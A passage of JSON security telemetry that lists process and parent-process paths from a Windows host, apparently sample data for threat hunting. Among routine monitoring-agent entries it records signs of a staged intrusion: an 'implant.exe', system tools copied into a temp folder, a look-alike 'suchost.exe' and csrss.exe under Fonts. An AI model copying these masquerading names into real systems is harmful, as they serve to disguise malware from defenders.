Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 